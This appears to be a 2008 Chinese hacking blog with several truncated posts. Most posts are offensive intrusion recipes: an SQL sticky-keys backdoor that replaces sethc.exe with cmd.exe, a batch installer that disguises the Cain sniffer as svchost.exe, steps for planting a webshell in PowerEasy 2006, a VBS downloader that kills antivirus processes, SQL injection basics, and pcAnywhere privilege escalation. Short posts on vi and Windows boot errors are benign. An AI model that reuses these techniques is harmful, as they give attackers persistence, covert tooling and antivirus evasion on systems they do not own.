泡泡鱼的部落格

查询分析器中替换粘滞键后门

Tue, 19 Aug 2008 17:34:29 +0800

如果我们获得了SA权限的服务器，可以通过查询分析器连接到数据库中，然后执行下面的SQL语句，就可以成功将cmd.exe 替换粘滞键程序^_^

Quote

declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out;
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe' ,'c:\windows\system32\sethc.exe';

打造绿色版的Cain

Mon, 04 Aug 2008 11:56:46 +0800

所用到的文件一共是五个，分别为：
Cain.exe
npf.sys
packet.dll
wanpacket.dll
wpcap.dll
将以上五个文件提取出后放在一个文件夹下，编写批处理文件install.bat ，内容如下：
@echo off
set SysDir=%SYSTEMROOT%\System32\
copy packet.dll %SysDir%\packet.dll /y
copy wpcap.dll %SysDir%\wpcap.dll /y
copy wanpacket.dll %SysDir%\wanpacket.dll /y
copy cain.exe %SysDir%\ras\svchost.exe /y
copy npf.sys %SysDir%\drivers\npf.sys /y
sc create

动易2006后台拿Webshell方法

Sat, 07 Jun 2008 10:23:28 +0800

针对版本：PowerEasy2006 SP6

进入后台后，我们在左边菜单栏中选择“系统设置”，然后在出现的菜单栏里选择“自定义页面管理”，接着需要先添加一个自定义页面分类，选择“添加自定义分类”这个选项，分类名称与分类简介都可以随便填写。填写完毕后选择“添加”，系统提示添加成功。下面再来选择“添加自定义页面”，“页面名称”随便输入，“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管，保持默认，不过如果没有改页面路径的话，默认生成的文件是在根目录下的，也就是http://www.xx.com/muma.asp.“文件名称”即输入生成的木马的文件名。建议起的有诱惑力一些。“页面简介”也不用管，下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。选择“自定义页面管理首页”，点击右边出现的“生成本页”。就OK 了。至此，成功获得动易2006SP6的Webshell

Linux下VI使用收藏

Sat, 12 Apr 2008 17:10:27 +0800

vi的使用之汇总

功能最强在的编辑器——vi
vi是所有UNIX系统都会提供的屏幕编辑器，它提供了一个视窗设备，通过它可以编辑文件。当然，对UNIX系统略有所知的人，或多或少都觉得vi超级难用，但vi是最基本的编辑器，所以希望读者能好好把它学起来，以后在UNIX世界里必将畅行无阻、游刃有余，因为其他几种文本处理器并非UNIX标准配备。说不定别人的Linux机器没安装joe或pico，如果您不会vi，那您可能就没辄了。
vi的基本概念
基本上vi可分为三种操作状态，分别是命令模式（Command mode）、插入模式（Insert mode）和底线命令模式（Last line mode），各模式的功能区分如下：
1． Comand mode：控制屏幕光标的移动，字符或光标的删除，移动复制某区段及进入Insert mode下，或者到Last line mode。

搜索型注入的基本判断

Wed, 09 Apr 2008 11:53:44 +0800

很早的时候就已经流行开来了。只是又有朋友总是问我，如何进行搜索型的注入，该填写什么注入语句进行测试。今天就再记录一下。
既然是搜索型注入，肯定首先是要找网页中具有搜索的地方。一般如果他的ASP文件如下所示，就可以进行提交注入语句了：

<%
key = request("key")
otype = request("otype")
if key = "" then
response.write "alert('查询字符串不能为空！');history.back();"
resopnse.end
end if
%>
……（省略中间代码）
<%
Set rs = Server.CreateObject("ADODB.Recordset")
if otype = "title" then

Windows2003系统开机服务出错的解决办法

Mon, 17 Mar 2008 22:40:39 +0800

经常见论坛中有人问如何解决每次Windows2003系统启动后总是有一个烦人的出错提示的问题。其实要解决这个也并不难。方法也不单一
你可以直接打开Windows的日志事件查看器，查看出错的日志。然后找到相应的服务将他关闭（如果可以）并且禁用。当然也可以采用另外一种方法，就是找到注册表中的HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows下，然后再它下面新建一个Dword类型的键值，命名为“NoPopUpsOnBoot”并设置其16进制值为1。然后下次重新启动后就不会弹出那个讨厌的提示对话框了。

功能超强大的VBS下载者

Thu, 13 Mar 2008 19:22:31 +0800

On Error Resume Next
nowdate=date()
Set ws=CreateObject("Wscript.Shell")
Set WMIs=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set Proc=WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name='360tray.exe'")
If Proc.Count<>0 Then
ws.run "cmd /c taskkill /f /im 360tray.exe",vbhide
End If
kkkbbb="avp.exe"
Set Proavp=WMIs.ExecQuery("SELECT * FROM Win32_Process WHERE Name="&kkkbbb)

[转]一个暴JSP网站源码的网页

Tue, 11 Mar 2008 09:26:26 +0800

作者：lcx


海阳顶端网jsp暴源码及目录网页使用帮助:
第一个写域名；第二个写路径；第三个写文件名，注意不要加扩展名:

一段Delphi广告插件源码

Mon, 04 Feb 2008 10:41:16 +0800

泡泡鱼点评：
很适合初学者上手。
学习目的：
1.Delphi中如何操作注册表创建键值
2.如何隐藏运行窗体
3.Timer控件的使用
注意点：
uses中要添加registry

***************************************************************************************
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Registry,shellapi, ExtCtrls;
type
TForm1 = class(TForm)
Timer1: TTimer;
procedure FormCreate(Sender: TObject);

PcAnywhere12提全方法

Sun, 03 Feb 2008 14:15:53 +0800

Author:fisco/泡泡鱼
Date:2008-2-3
[未经本人同意任何媒体个人不得转载]

在早期的入侵提权中，我们经常可以看到使用利用安装PcAnywhere的服务器下载cif文件，然后使用明小子或者其他专用的密码读取工具进行读取控制密码的提权方法。这个应该算是PcAnywhere的一个硬伤了。而通常这个文件存在的目录是“C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere”guest权限对该目录是具有访问权限的。所以就可以下载cif配置文件进行读取，然后本地连接进行提权。
但是这一方法在最新的12.1版本中，已经不可以了。我们再去下载该cif文件，用密码读取工具是读不到密码的，即使可以读得到，也是乱码。但是通过浏览安装目录，我们可以发现。在PcAnywhere的“C:\Documents